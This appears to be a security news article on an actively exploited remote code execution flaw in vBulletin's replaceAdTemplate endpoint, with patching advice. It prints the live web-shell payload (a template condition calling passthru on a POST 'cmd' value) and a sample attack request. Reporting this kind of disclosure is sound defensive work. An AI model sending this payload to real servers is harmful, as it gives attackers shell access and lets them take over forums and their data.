A newly disclosed and actively exploited unauthenticated Remote Code Execution (RCE) vulnerability in vBulletin forum software threatens thousands of online communities worldwide.
The flaw, impacting vBulletin versions 5.0.0 through 6.0.3, allows attackers to execute arbitrary commands on vulnerable servers, posing a severe risk to data integrity and site control.
The vulnerability, recently uncovered by the security research group Karma(In)Security, leverages insecure handling within the ajax/api/ad/replaceAdTemplate endpoint. Attackers can inject raw PHP code through this endpoint, enabling execution without authentication. The payload observed in live attacks is shockingly simple:
php<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>
When sent via a crafted HTTP POST request, this code injects a backdoor, giving the attacker remote shell access to the server by executing any command passed in the cmd POST parameter.
Sample malicious POST request:
textPOST /ajax/api/ad/replaceAdTemplate HTTP/1.1
Host: vulnerable-forum.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded
cmd=whoami
On May 26, 2025, honeypot systems detected several exploitation attempts from a Polish IP address (195.3.221.137), confirming real-world attacks.
Evidence suggests attackers are using the proof-of-concept code released by researchers, rather than automated attack frameworks.
The vulnerability has drawn attention in the security community due to the existence of a Nuclei template and increasing scan activity observed in industry logs, such as those tracked by the SANS Internet Storm Center. Despite the patch being available for over a year (in versions 6.0.3 Patch Level 1, 6.0.2 Patch Level 1, 6.0.1 Patch Level 1, and 5.7.5 Patch Level 3), many forums remain dangerously exposed.
While the CVE assignments (CVE-2025-48827 and CVE-2025-48828) are pending public documentation, the implications are clear: Admins must update vBulletin immediately to at least version 6.0.3 PL1 or, ideally, the current 6.1.1 version. Delay in patching risks complete server compromise.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…